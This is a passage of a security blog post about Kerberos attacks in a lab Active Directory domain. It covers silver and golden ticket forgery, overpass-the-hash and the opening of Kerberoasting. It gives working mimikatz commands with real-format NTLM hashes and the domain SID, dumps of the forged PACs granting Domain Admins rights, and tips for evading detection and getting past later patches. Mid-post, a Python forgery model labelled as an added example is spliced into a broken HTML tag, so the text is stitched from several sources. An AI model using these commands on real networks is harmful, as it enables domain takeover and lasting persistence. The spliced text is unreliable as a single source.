class=\"ez-toc-section-end\"><\/span><\/h1>\n<h2><span class=\"ez-toc-section\" id=\"Silver_ticket\"><\/span>Silver ticket<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Looking back at the Kerberos authentication flow, we split it into two parts, summarized in the following image<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-300x205.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-768x524.jpg 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy.jpg 1242w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Edit: Message D, the Authenticator, is encrypted using the <span style=\"color: #ff0000;\">session<\/span> key obtained from Message A as mentioned before, and not using the user&#8217;s <span style=\"color: #ff0000;\">secret<\/span> key; sorry for the mistype, and thanks go to <a 
href=\"https:\/\/twitter.com\/abdelrhman1919\">@abdelrhman1919<\/a>.<\/p>\n<p><strong>The 1st part<\/strong>, Client &lt;&#8212;&gt; KDC<br \/>\nThis part ends with the client holding a copy of the TGS, encrypted with the service&#8217;s key, together with the following values it decrypted from Message F<\/p>\n<ul>\n<li><span style=\"color: #ff0000;\">Service session key<\/span><\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<li>Service name<\/li>\n<\/ul>\n<p><strong>The 2nd part<\/strong>, Client &lt;&#8211;&gt; Service. This is the more interesting part for the silver ticket.<br \/>\nTo authenticate to the service, the client sends the copy of the TGS that is encrypted with the service key as mentioned (Message E) and contains<\/p>\n<ul>\n<li>Service session key<\/li>\n<li>Username<\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<li>PAC information<\/li>\n<\/ul>\n<p>and the authenticator message (Message G), which is encrypted using the service session key and contains<\/p>\n<ul>\n<li>Username<\/li>\n<li>Timestamp<\/li>\n<\/ul>\n<p>So the actual service authentication starts at <strong>step 5<\/strong>, and all that is needed is the service&#8217;s secret key.<br \/>\nIf you have a service&#8217;s secret key, you can simply generate a random session key, put it in a service ticket of your own making, encrypt that ticket with the service&#8217;s secret, and send it to the service when authenticating.<br \/>\nAll the service does is decrypt the ticket with its own key, which succeeds because that is the very key you encrypted it with, and then use the session key (which you generated) to decrypt the authenticator, exactly as described above. The service never has to contact the KDC, so unless it performs the optional PAC validation described earlier, nothing in this exchange can tell a forged ticket from a genuine one.<br \/>\nThat&#8217;s how easy it is.<br \/>\nA demo will make this clearer: I have the WIN10$ machine account key and will use it to create a silver ticket for that machine without making a single connection to the KDC!<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-624\" 
src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/27.png\" alt=\"\" width=\"717\" height=\"425\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-624\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/27.png\" alt=\"\" width=\"717\" height=\"425\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/27.png 717w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/27-300x178.png 300w\" sizes=\"auto, (max-width: 717px) 100vw, 717px\" \/><\/noscript><\/p>\n<p>These are the current tickets in that session, and I get access denied whenever I try to reach SMB on the target machine.<\/p>\n<p>To create the ticket I will use mimikatz<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">kerberos::golden \/user:administrator \/domain:jnkfo.lab \/sid:S-1-5-21-3178339118-3033626349-2532976716 \/target:win10.jnkfo.lab \/rc4:1ad9c160bd7ab9cb4b7c890c96862305 \/service:cifs<\/pre>\n<ul>\n<li>user: the username; this can be any value, even a non-existent account works, because the service never asks the KDC about it<\/li>\n<li>domain: the domain name<\/li>\n<li>sid: the domain SID, which can be obtained in many ways; whoami \/user prints your own SID, and the domain SID is everything before the last dash<\/li>\n<li>target: the target machine; together with \/service it forms the SPN (cifs\/win10.jnkfo.lab) the ticket is forged for<\/li>\n<li>rc4: the NTLM hash of the account the service runs as, here the WIN10$ machine account dumped earlier; mimikatz also accepts \/aes128 and \/aes256 keys, which stand out less where RC4 service tickets are otherwise rare<\/li>\n<li>service: the service class, cifs here since I am accessing the file sharing service<\/li>\n<\/ul>\n<p>Executing this will result in<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-625\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/28.png\" alt=\"\" width=\"721\" height=\"733\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-625\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/28.png\" alt=\"\" width=\"721\" height=\"733\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/28.png 
721w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/28-295x300.png 295w\" sizes=\"auto, (max-width: 721px) 100vw, 721px\" \/><\/noscript><\/p>\n<p>and no Kerberos packets are sent to the KDC, as you don&#8217;t need to talk to KDC at all, You got your own TGS and that&#8217;s all.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-626\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-1024x529.png\" alt=\"\" width=\"1024\" height=\"529\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-626\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-1024x529.png\" alt=\"\" width=\"1024\" height=\"529\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-1024x529.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-300x155.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29-768x397.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/29.png 1233w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>So you&#8217;ll find that only the ticket and authenticator were sent directly to the target machine.<\/p>\n<p>If you checked the ticket&#8217;s PAC you&#8217;ll find<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">VALIDATION_INFO \r\nCommonHeader:                   \r\n    Version:                         1 \r\n    Endianness:                      16 \r\n    CommonHeaderLength:              8 \r\n    Filler:                          3435973836 \r\nPrivateHeader:                  \r\n    ObjectBufferLength:              0 \r\n    Filler:                          3435973836 \r\nData:                           \r\n    LogonTime:                      \r\n        dwLowDateTime:                   3283888000 \r\n        dwHighDateTime:               
   30809500 \r\n    LogoffTime:                     \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    KickOffTime:                    \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordLastSet:                \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordCanChange:              \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordMustChange:             \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    EffectiveName:                   u'administrator' \r\n    FullName:                        NULL \r\n    LogonScript:                     NULL \r\n    ProfilePath:                     NULL \r\n    HomeDirectory:                   NULL \r\n    HomeDirectoryDrive:              NULL \r\n    LogonCount:                      0 \r\n    BadPasswordCount:                0 \r\n    UserId:                          500 \r\n    PrimaryGroupId:                  513 \r\n    GroupCount:                      5 \r\n    GroupIds:                       \r\n        [\r\n             \r\n            RelativeId:                      513 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      512 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      520 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      518 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      519 \r\n            Attributes:                      7 ,\r\n        ] \r\n    UserFlags:                       0 
\r\n    UserSessionKey:                 \r\n        Data:                            '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    LogonServer:                     NULL \r\n    LogonDomainName:                 u'JNKFO' \r\n    LogonDomainId:                  \r\n        Revision:                        1 \r\n        SubAuthorityCount:               4 \r\n        IdentifierAuthority:             '\\x00\\x00\\x00\\x00\\x00\\x05' \r\n        SubAuthority:                   \r\n            [\r\n                 21,\r\n                 3178339118,\r\n                 3033626349,\r\n                 2532976716,\r\n            ] \r\n    LMKey:                           '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    UserAccountControl:              528 \r\n    SubAuthStatus:                   0 \r\n    LastSuccessfulILogon:           \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    LastFailedILogon:               \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    FailedILogonCount:               0 \r\n    Reserved3:                       0 \r\n    SidCount:                        0 \r\n    ExtraSids:                       NULL \r\n    ResourceGroupDomainSid:          NULL \r\n    ResourceGroupCount:              0 \r\n    ResourceGroupIds:                NULL<\/pre>\n<p>UserId 500 is the RID of the built-in Administrator account, and the group RIDs are Domain Users (513), Domain Admins (512), Group Policy Creator Owners (520), Schema Admins (518) and Enterprise Admins (519), the default set mimikatz writes into a forged PAC.<br \/>\nSo the ticket tells the service that you are an administrator of the machine, no matter what username you used.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Golden_ticket\"><\/span>Golden ticket<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Back to the same figure<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" 
src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-623\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg\" alt=\"\" width=\"1024\" height=\"698\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-1024x698.jpg 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-300x205.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy-768x524.jpg 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2020-04-28_20-26-20-copy.jpg 1242w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>The golden ticket is all about the TGT. If you remember, the TGT (Message B) carries the information the KDC needs to issue you the service ticket you ask for.<br \/>\nIf a user with a valid TGT asks for a ticket to any service, the KDC will grant it.<\/p>\n<p>The golden ticket attack takes place at step 3 (TGS-REQ).<br \/>\nThe TGT is encrypted with the KRBTGT account&#8217;s key; the KDC decrypts it and issues the service ticket with the same group memberships and validation info it finds in the TGT.<br \/>\nSo, if you have the KRBTGT hash, you can forge your own TGT whose PAC carries any group membership you want, 
including domain admins!<br \/>\nSending this TGT to the KDC results in a service ticket with Domain Admins membership inside!<\/p>\n<p>Let&#8217;s give this a try using mimikatz<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">kerberos::golden \/domain:jnkfo.lab \/sid:S-1-5-21-3178339118-3033626349-2532976716 \/rc4:53de9e86989349da8d705da4e238dede \/user:invalidusername \/ticket:golden.kirbi \/ptt<\/pre>\n<p>No new options here: the \/service option used for the silver ticket is gone, \/rc4 is now the NTLM hash of the krbtgt account, \/ticket writes the forged TGT to a file and \/ptt injects it into the current logon session.<br \/>\nNote that domain controllers patched for CVE-2021-42287 (the November 2021 updates and their later enforcement phases) check that the account named in the TGT actually exists and matches its RID, so a made-up \/user like this one is rejected there; forge the ticket for a real account, with its real \/id, instead.<\/p>\n<p>I will try to list C$ on the domain controller, which requires domain admin rights.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-627\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/30.png\" alt=\"\" width=\"724\" height=\"892\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-627\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/30.png\" alt=\"\" width=\"724\" height=\"892\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/30.png 724w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/30-243x300.png 243w\" sizes=\"auto, (max-width: 724px) 100vw, 724px\" \/><\/noscript><\/p>\n<p>You will notice that TGS-REQ and TGS-REP were exchanged with the KDC before moving to the target machine, and that is a difference between the silver and the golden ticket:<br \/>\nwith a golden ticket you are not restricted to a single service. You hold the KRBTGT key, so you can create your own TGT and, from it, get a TGS for whatever service you want.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-628\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31.png\" alt=\"\" width=\"1010\" height=\"433\" 
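\/><\/p>
<p>The silver and golden tickets differ only in which key the forger holds, and that becomes obvious once the checks from the AP-REQ and Authorization sections are written down. The following Python model is an added example, not code from this post, from impacket or from mimikatz: a keyed HMAC-SHA256 stream cipher with an appended tag stands in for the Kerberos encryption types, JSON dicts stand in for the ASN.1 ticket and the NDR-encoded PAC, and the krbtgt and WIN10$ keys, the SPN and the RIDs are constructed inside the script. It issues an honest service ticket for win10user, forges a silver ticket with nothing but the WIN10$ key, pushes a golden ticket through the modelled KDC, and runs each through the service-side check with and without the optional PAC validation round trip to the DC.<\/p>

```python
"""Toy model of the trust behind silver and golden tickets (added example). HMAC-SHA256 in counter mode
plus a tag stands in for the Kerberos ciphers, JSON dicts for the ASN.1 ticket and the NDR-encoded PAC;
keys, realm, SPN and RIDs are constructed for this script."""
import hashlib, hmac, json, os, time
SKEW = 300  # RFC 4120 default maximum clock skew (5 minutes)

def _mac(key, data):
    return hmac.new(key, data, hashlib.sha256).digest()

def _keystream(key, nonce, n):
    # counter-mode keystream from HMAC-SHA256 (stand-in for the Kerberos cipher)
    return b"".join(_mac(key, nonce + i.to_bytes(4, "big")) for i in range((n + 31) // 32))[:n]

def seal(key, obj):
    # encrypt-then-MAC: whoever holds `key` can both read and forge a blob
    pt, nonce = json.dumps(obj, sort_keys=True).encode(), os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + _mac(key, nonce + ct)

def unseal(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, _mac(key, nonce + ct)):
        raise ValueError("wrong key or tampered blob")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

def _pac_bytes(pac):
    return json.dumps({"user": pac["user"], "groups": sorted(pac["groups"])}, sort_keys=True).encode()

def make_pac(user, groups, server_key, kdc_key):
    # MS-PAC style: a server checksum under the ticket's own key and a KDC checksum under krbtgt
    pac = {"user": user, "groups": sorted(groups)}
    raw = _pac_bytes(pac)
    return {**pac, "server_sig": _mac(server_key, raw).hex(), "kdc_sig": _mac(kdc_key, raw).hex()}

def make_ticket(enc_key, user, spn, pac, session_key, now, lifetime=10 * 3600):
    # Message B if enc_key is the krbtgt key, Message E if it is the service key; KDC and forger run the same code
    return seal(enc_key, {"user": user, "spn": spn, "session_key": session_key.hex(),
                          "start": now, "end": now + lifetime, "pac": pac})

def kdc_tgs_rep(krbtgt_key, service_keys, tgt_blob, spn, now):
    # Steps 3-4: check the TGT's PAC signatures (both under krbtgt), then re-sign that same PAC into a
    # service ticket; the KDC does not consult AD for the group list again
    tgt = unseal(krbtgt_key, tgt_blob)
    pac, raw = tgt["pac"], _pac_bytes(tgt["pac"])
    if any(pac[s] != _mac(krbtgt_key, raw).hex() for s in ("server_sig", "kdc_sig")):
        raise ValueError("TGT PAC checksum mismatch")
    new_pac = make_pac(pac["user"], pac["groups"], service_keys[spn], krbtgt_key)
    session_key = os.urandom(16)  # also returned to the client in Message F (not modelled)
    return make_ticket(service_keys[spn], tgt["user"], spn, new_pac, session_key, now), session_key

def service_ap_req(service_key, ticket_blob, auth_blob, now, kdc_verify=None):
    # Steps 5-6: everything the service checks; returns the PAC group RIDs on success
    t = unseal(service_key, ticket_blob)  # the service key is the only gate here
    a = unseal(bytes.fromhex(t["session_key"]), auth_blob)  # Message G under the session key
    if a["user"] != t["user"]:
        raise ValueError("authenticator principal differs from ticket principal")
    if abs(now - a["ctime"]) > SKEW:
        raise ValueError("authenticator timestamp outside clock skew")
    if not t["start"] - SKEW <= now <= t["end"]:
        raise ValueError("service ticket expired")
    raw = _pac_bytes(t["pac"])
    if t["pac"]["server_sig"] != _mac(service_key, raw).hex():
        raise ValueError("PAC server checksum mismatch")
    if kdc_verify is not None:  # optional KERB_VERIFY_PAC round trip to the DC
        kdc_verify(raw, t["pac"]["kdc_sig"])
    return t["pac"]["groups"]

def run_scenarios(now=None):
    # Honest logon, silver ticket and golden ticket against one CIFS service
    now = now or int(time.time())
    krbtgt_key, win10_key = os.urandom(32), os.urandom(32)  # constructed secrets
    spn = "cifs/win10.jnkfo.lab"
    def kdc_verify(raw, sig):  # what the DC does with a KERB_VERIFY_PAC request
        if sig != _mac(krbtgt_key, raw).hex():
            raise ValueError("PAC KDC checksum mismatch")
    def attempt(ticket, sk, user, verify):  # AP-REQ = ticket + authenticator (Message G)
        try:
            return service_ap_req(win10_key, ticket, seal(sk, {"user": user, "ctime": now}), now, verify)
        except ValueError as e:
            return str(e)
    out = {}
    # 1. Honest win10user (Domain Users only): TGT, then TGS-REQ/TGS-REP, then AP-REQ
    pac = make_pac("win10user", [513], krbtgt_key, krbtgt_key)
    tgt = make_ticket(krbtgt_key, "win10user", "krbtgt/JNKFO.LAB", pac, os.urandom(16), now)
    st, sk = kdc_tgs_rep(krbtgt_key, {spn: win10_key}, tgt, spn, now)
    out["legit"] = attempt(st, sk, "win10user", kdc_verify)
    # 2. Silver ticket: only win10_key is known, so the KDC checksum has to be faked
    fake_pac = make_pac("administrator", [513, 512, 519], win10_key, os.urandom(32))
    sk = os.urandom(16)
    silver = make_ticket(win10_key, "administrator", spn, fake_pac, sk, now)
    out["silver"] = attempt(silver, sk, "administrator", None)
    out["silver_validated"] = attempt(silver, sk, "administrator", kdc_verify)
    # 3. Golden ticket: krbtgt_key forges the TGT and the genuine KDC does the rest
    pac = make_pac("invalidusername", [513, 512, 519], krbtgt_key, krbtgt_key)
    gtgt = make_ticket(krbtgt_key, "invalidusername", "krbtgt/JNKFO.LAB", pac, os.urandom(16), now)
    st, sk = kdc_tgs_rep(krbtgt_key, {spn: win10_key}, gtgt, spn, now)
    out["golden_validated"] = attempt(st, sk, "invalidusername", kdc_verify)
    return out

if __name__ == "__main__": print(run_scenarios())
```

<p>Running it prints one result per scenario and shows the asymmetry described above: the silver ticket passes every check the service performs on its own, because the ticket and the PAC&#8217;s server signature are both under the service key the attacker already has, and only the KDC signature check, which needs the round trip to the DC, rejects it. The golden ticket passes even that, because the forger holds the krbtgt key that both the KDC and PAC validation trust, which is why a leaked krbtgt key is only dealt with by resetting the krbtgt password twice.<\/p>
<p><img 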
\/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-628\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31.png\" alt=\"\" width=\"1010\" height=\"433\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31.png 1010w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31-300x129.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/31-768x329.png 768w\" sizes=\"auto, (max-width: 1010px) 100vw, 1010px\" \/><\/noscript><\/p>\n<p>If we viewed the ticket&#8217;s contents we will find the following PAC inside<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">CommonHeader:                   \r\n    Version:                         1 \r\n    Endianness:                      16 \r\n    CommonHeaderLength:              8 \r\n    Filler:                          3435973836 \r\nPrivateHeader:                  \r\n    ObjectBufferLength:              0 \r\n    Filler:                          3435973836 \r\nData:                           \r\n    LogonTime:                      \r\n        dwLowDateTime:                   2159116928 \r\n        dwHighDateTime:                  30809507 \r\n    LogoffTime:                     \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    KickOffTime:                    \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordLastSet:                \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordCanChange:              \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    PasswordMustChange:             \r\n        dwLowDateTime:                   4294967295 \r\n        dwHighDateTime:                  2147483647 \r\n    EffectiveName:            
       u'invalidusername' \r\n    FullName:                        NULL \r\n    LogonScript:                     NULL \r\n    ProfilePath:                     NULL \r\n    HomeDirectory:                   NULL \r\n    HomeDirectoryDrive:              NULL \r\n    LogonCount:                      0 \r\n    BadPasswordCount:                0 \r\n    UserId:                          500 \r\n    PrimaryGroupId:                  513 \r\n    GroupCount:                      5 \r\n    GroupIds:                       \r\n        [\r\n             \r\n            RelativeId:                      513 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      512 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      520 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      518 \r\n            Attributes:                      7 ,\r\n             \r\n            RelativeId:                      519 \r\n            Attributes:                      7 ,\r\n        ] \r\n    UserFlags:                       0 \r\n    UserSessionKey:                 \r\n        Data:                            '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    LogonServer:                     NULL \r\n    LogonDomainName:                 u'JNKFO' \r\n    LogonDomainId:                  \r\n        Revision:                        1 \r\n        SubAuthorityCount:               4 \r\n        IdentifierAuthority:             '\\x00\\x00\\x00\\x00\\x00\\x05' \r\n        SubAuthority:                   \r\n            [\r\n                 21,\r\n                 3178339118,\r\n                 3033626349,\r\n                 2532976716,\r\n            ] \r\n    LMKey:                           '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \r\n    UserAccountControl:              528 
\r\n    SubAuthStatus:                   0 \r\n    LastSuccessfulILogon:           \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    LastFailedILogon:               \r\n        dwLowDateTime:                   0 \r\n        dwHighDateTime:                  0 \r\n    FailedILogonCount:               0 \r\n    Reserved3:                       0 \r\n    SidCount:                        0 \r\n    ExtraSids:                       NULL \r\n    ResourceGroupDomainSid:          NULL \r\n    ResourceGroupCount:              0 \r\n    ResourceGroupIds:                NULL <\/pre>\n<p>Note the UserId of 500, which is the RID of the built-in Administrator account, and the Domain Admins group RID 512.<\/p>\n<p>The KDC sends this information inside the TGS to the client, which in turn presents it to the service when accessing it.<\/p>\n<p>Now, knowing the timestamp and the lifetime of the ticket, along with the fact that the KRBTGT account password isn&#8217;t usually changed frequently in AD environments, can you figure out why the golden ticket is considered a long-term persistence method?<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Overpass_the_hash\"><\/span>Overpass the hash<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>In some cases, if you obtained the user&#8217;s hash you may not be able to crack it or use it in a pass-the-hash attack, for many reasons.<br \/>\nFor example: NTLM authentication is disabled.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-633\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/34.png\" alt=\"\" width=\"690\" height=\"247\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-633\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/34.png\" alt=\"\" width=\"690\" height=\"247\" 
srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/34.png 690w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/34-300x107.png 300w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/noscript><\/p>\n<p>In this case, if you used the pass the hash technique<br \/>\nsekurlsa::pth \/user:win10user \/domain:jnkfo.lab \/ntlm:e19ccf75ee54e06b06a5907af13cef42<br \/>\nand tried accessing the machine directly, You&#8217;ll fail<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-634\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-1024x145.png\" alt=\"\" width=\"1024\" height=\"145\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-634\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-1024x145.png\" alt=\"\" width=\"1024\" height=\"145\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-1024x145.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-300x42.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32-768x109.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/32.png 1464w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>But knowing how Kerberos works, you know that by having the user&#8217;s key you may just go through the whole Kerberos authentication process.<br \/>\nWithout bothering using the NTLM challenge-response auth.<br \/>\nThe attack was implemented in mimikatz already and can be used also via impacket examples<br \/>\nTo use it via mimikatz, all you will need to do is connecting to the target&#8217;s hostname instead of the direct IP, this will force Windows to use Kerberos instead of NTLM auth (Remember?!!!).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-635\" 
src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-1024x290.png\" alt=\"\" width=\"1024\" height=\"290\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-635\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-1024x290.png\" alt=\"\" width=\"1024\" height=\"290\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-1024x290.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-300x85.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33-768x217.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/33.png 1498w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Obviously, overpass the hash take place since the AS-REQ step.<br \/>\nThat&#8217;s how easy it&#8217;s<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Kerbroasting\"><\/span>Kerbroasting<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>I mentioned earlier, that Kerberos authentication itself is all about authentication, not authorization<br \/>\nIf you got a valid domain user, you may just ask the KDC to issue you a valid TGS for any service.<br \/>\nKnowing the fact that SPN attributes can be set to a specific username, and that the TGS is encrypted using service&#8217;s 